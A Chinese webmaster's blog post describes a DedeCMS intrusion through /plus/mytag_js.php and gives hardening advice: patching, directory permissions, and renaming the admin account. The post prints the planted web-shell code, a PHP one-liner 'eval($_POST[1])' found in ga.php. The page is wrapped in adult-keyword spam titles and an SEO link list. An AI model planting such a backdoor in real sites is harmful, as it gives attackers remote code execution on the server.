中文字幕第五页-中文字幕第页-中文字幕韩国-中文字幕最新-国产尤物二区三区在线观看-国产尤物福利视频一区二区

談Dedecms一些隱患以及如何預防風險

2023-02-02    分類: 網(wǎng)站建設

dedecms一直是很火的建站cms,主要得益于兩大站長網(wǎng)的鼎力支持;不過,人火是非多,cms太火了同樣會被別有用心的人盯上。我的網(wǎng)站一直在使用dedecms,前段時間又一次受到攻擊,攻擊的目的很簡單,那么便是黑鏈,知道后稍微修改下代碼就恢復了,不是很嚴重;這段時間網(wǎng)站又被莫名上傳文件,類似前一次,雖然對方還沒來得及修改網(wǎng)站模板,不過這說明網(wǎng)站安全防患還未到位,對方任何時候都可能再次取得管理員權限,所以要特別注意網(wǎng)站的安全防患措施。

因為我比較喜歡尋根究底,所以就去網(wǎng)上找了一下相關的資料,發(fā)現(xiàn)這確實是dedecms的漏洞,黑客可以利用多維的變量繞過正則檢測,漏洞主要發(fā)生在/plus/mytag_js.php中,原理便是準備一個MySQL數(shù)據(jù)庫來攻擊已知網(wǎng)站的數(shù)據(jù)庫,通過向數(shù)據(jù)庫中寫入一句話的代碼,只要成功寫入,那么以后便可以利用這些代碼來獲得后臺管理員權限。

結合我的網(wǎng)站被攻擊已經(jīng)別人類似的經(jīng)歷來看,黑客寫入的文件主要存在于/plus/文件夾下,目前已知的幾個文件包括ga.php、log.php、b.php、b1.php等,文件的特征便是短小,內(nèi)容很少,可能寫入的時候不是很方便,不過這些代碼的作用確實不小的。

下面這是ga.php文件中的部分代碼:

no
eval($_POST[1])
?>
no
eval($_POST[1])
?>
no
eval($_POST[1])
?>

實際的代碼比上面截取的要長,不過都是這段代碼的重復,至于log.php的代碼,同這個類似,只有一句話,簡單明了,如果你對網(wǎng)絡安全稍有了解,那么會知道是php一句話木馬,使用部分指定的工具可以執(zhí)行這段代碼,預計是破解密碼的功能。

既然已經(jīng)知道對方是利用什么樣的漏洞,同時知道對方利用什么樣的原理來利用漏洞,那么要怎么預防這些危險的事發(fā)生呢?經(jīng)過查詢大量的資料,我初步整理出下面這些預防漏洞被利用的步驟,希望對同樣適用dedecms的站長朋友們有所幫助。

一、升級版本打好補丁設置目錄權限

這是官方對此的解決辦法,不管你使用的是什么版本的dedecms,都要及時在后臺升級版本自動更新補丁,這是避免漏洞被利用的最重要的一步;同時官方還提供設置目錄的方法,主要是設置data、templets、uploads、a為可讀寫不可執(zhí)行權限;include、member、plus、后臺管理目錄等設置為可執(zhí)行可讀不可寫入權限;刪除install及special目錄,具體如何設置見官方說明。

二、修改admin賬號及密碼

黑客可能是利用默認admin賬號,隨后推測密碼來破解的,所以修改默認的admin賬號非常重要,至于如何修改,方法很多,比較有效的是用phpadmin登陸網(wǎng)站數(shù)據(jù)庫,找到dede_admin數(shù)據(jù)庫表(dede是數(shù)據(jù)庫表前綴),修改其中userid及pwd兩項,其中密碼一定要修改成f297a57a5a743894a0e4,這是默認的密碼admin;修改后去后臺登陸,登陸dede后臺后修改密碼。

三、別的值得注意的地方

至于更多的細節(jié),同樣要注意,盡量別選擇太廉價的空間,太廉價的空間很容易出現(xiàn)服務器本身的安全問題,只要服務器出現(xiàn)問題,整個服務器下面的網(wǎng)站都沒救了。還有便是,如果沒必要,盡量別開通會員注冊什么的,使用起來很麻煩;至于網(wǎng)站后臺目錄,不要寫到robots.txt里面,同時每個月至少換一次,管理員密碼什么的同樣要更換,避免和別的賬號密碼相同被推測出來。

經(jīng)過這幾次網(wǎng)站被攻擊的實例,不得不說,互聯(lián)網(wǎng)不是一個可以安心睡大覺的網(wǎng),作為站長,算是織網(wǎng)的人,更應該注重網(wǎng)絡安全;只要按照要求去做到了這些防范措施,不說100%,至少95%的可能不會被順利取得后臺權限。

網(wǎng)頁標題:談Dedecms一些隱患以及如何預防風險
本文路徑:http://m.2m8n56k.cn/news41/234241.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供電子商務手機網(wǎng)站建設微信小程序響應式網(wǎng)站商城網(wǎng)站軟件開發(fā)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉載內(nèi)容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:[email protected]。內(nèi)容未經(jīng)允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯(lián)

外貿(mào)網(wǎng)站建設
主站蜘蛛池模板: 久久国产免费一区 | 香蕉毛片a| 国产一区二区三区在线观看影院 | 成 人 黄 色 激 情视频网站 | 日本aaaa片毛片免费观看 | 国产亚洲精品成人一区看片 | 人摸人操| 大陆精品自在线拍国语 | 亚洲精品www久久久久久久软件 | www国产| 亚洲www| 国产嫩草影院在线观看 | 欧美特黄aaaaaaaa大片 | aaa一级毛片 | 久久一区二区精品 | 亚洲欧美一区二区三区在线 | 免费一区二区三区四区 | 国产理论视频在线观看 | 不卡午夜视频 | 国内精品自产拍在线观看91 | 国产午夜精品理论片影院 | 美女网站18| 综合网自拍 | 欧美性色黄在线视 | 97视频在线免费播放 | 在线观看国产精成人品 | 波多野结衣视频免费观看 | 91手机看片国产福利精品 | 久久精品国产大片免费观看 | 亚洲欧美自拍视频 | 久久久久久久久一级毛片 | 综合图片亚洲网友自拍10p | 亚洲精品一区91 | 亚洲高清一区二区三区四区 | 97超频国产在线公开免费视频 | 欧美三级在线视频 | 毛片天堂| a级午夜毛片免费一区二区 a级性生活视频 | 亚洲最黄视频 | 久久国产精品久久国产精品 | 日本精品一区二区三区在线视频一 |